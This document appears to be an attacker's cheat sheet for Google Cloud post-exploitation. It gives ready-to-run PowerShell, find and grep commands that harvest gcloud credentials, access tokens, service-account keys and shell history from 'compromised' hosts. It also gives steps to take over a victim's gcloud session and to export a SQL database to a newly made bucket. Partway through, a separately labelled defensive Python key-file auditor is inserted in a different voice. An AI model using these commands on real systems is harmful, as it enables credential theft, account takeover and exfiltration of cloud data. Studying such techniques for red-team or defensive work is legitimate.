External application (default credential)
Stored in $HOME/.config/gcloud/application_default_credentials.json
or %APPDATA%\gcloud\application_default_credentials.json,
or at the path given by the $env:GOOGLE_APPLICATION_CREDENTIALS environment variable.
Get-ChildItem -Path C:\users\* -Include *application_default_credentials.json* -Recurse -Force -ErrorAction silentlycontinue
find /home/ -iname application_default_credentials.json 2>/dev/null
env | grep GOOGLE
Access tokens are saved in $HOME/.config/gcloud/
or %APPDATA%\gcloud\
The value is stored in the SQLite database access_tokens.db, table access_tokens.
Get-ChildItem C:\Users\* -Name gcloud -Directory -Recurse -Force -ErrorAction silentlycontinue
find /home/ -iname gcloud 2>/dev/null
Copy the gcloud dir to your own home directory to auth as the compromised user
sudo cp -r /home/<USER>/.config/gcloud ~/.config
sudo chown -R <USER>:<USER> ~/.config/gcloud
gcloud auth list
Find JSON key files for service accounts. They have no default name, but the layout is:
{
"type": "service_account",
"project_id": "<PROJECT ID>",
"private_key_id": "<ID>",
"private_key": "<KEY>",
"client_email": "<SERVICE ACCOUNT EMAIL>",
"client_id": "<ID>",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/svc-acc%40alert-nimbus-335411.iam.gserviceaccount.com"
}
grep -ir --include=\*.json 'private_key_id' / 2>/dev/null
Get-ChildItem C:\ -Recurse -Force -Include *.json -Erroraction silentlycontinue | Select-String "private_key_id"
Authenticate with key file
gcloud auth activate-service-account --key-file key.json
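For the defender auditing hosts for leftover key files, the following is an added example (not part of the original notes): it walks a directory tree, parses each *.json file against the service-account layout shown above, and reports only the identity fields (project, client_email, key id) so the key can be rotated or removed without the private key itself being echoed. The SAMPLE_KEY value is a constructed placeholder, not a real key.

```python
import json
import os
# Fields that together identify the service-account key layout shown above.
REQUIRED_FIELDS = {"type", "project_id", "private_key_id", "private_key", "client_email"}


def classify_key_file(text):
    """Return a redacted summary if text is a service-account key, else None."""
    try:
        data = json.loads(text)
    except ValueError:
        return None
    if not isinstance(data, dict) or data.get("type") != "service_account":
        return None
    if not REQUIRED_FIELDS.issubset(data):
        return None
    # Report identity fields only; the private key itself is never echoed.
    return {
        "project_id": data["project_id"],
        "client_email": data["client_email"],
        "private_key_id": data["private_key_id"],
        "has_private_key": str(data["private_key"]).startswith("-----BEGIN"),
    }


def find_service_account_keys(root):
    """Walk root and return [(path, summary)] for every key file found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".json"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    summary = classify_key_file(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the audit
            if summary:
                hits.append((path, summary))
    return hits


# Constructed sample (placeholder values, not a real key) for a quick self-check.
SAMPLE_KEY = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "private_key_id": "0123456789abcdef",
    "private_key": "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER\n-----END PRIVATE KEY-----\n",
    "client_email": "svc@example-project.iam.gserviceaccount.com",
})
```

Run find_service_account_keys("/home") (or a user profile root on Windows) to list every key file present; each hit is a long-lived credential that should be rotated and deleted from the host.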
Web config and App config files
Web.config and app.config files might contain creds or access tokens.
Look for management certs and extract them to .pfx, as with publishsettings files.
sudo find / -name web.config 2>/dev/null
Get-ChildItem -Path C:\ -Filter app.config -Recurse -ErrorAction SilentlyContinue -Force
Find internal repos (scan for port 80/443, or query AD and look for subdomains or hostnames such as git, code, repo, gitlab, bitbucket, etc.)
Tools for finding secrets
Look through command history: ~/.bash_history
or %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
sudo find / -name .bash_history 2>/dev/null
Get-ChildItem -Path C:\ -Filter *ConsoleHost_history.txt* -Recurse -ErrorAction SilentlyContinue -Force
cat <FILE> | select-string password
cat <FILE> | select-string secure
Get-Childitem -Path C:\* -Force -Include *transcript* -Recurse -ErrorAction SilentlyContinue
type C:\Transcripts\20210422\PowerShell_transcript.DESKTOP-M7C1AFM.6sZJrDuN.20210422230739.txt
gcloud sql instances list
gcloud sql databases list --instance <instance name>
gcloud spanner instances list
gcloud spanner databases list --instance <instance name>
gcloud bigtable instances list
Create new storage bucket, change perms, export SQL DB
gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>
gsutil cp gs://bucket-name/folder/
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"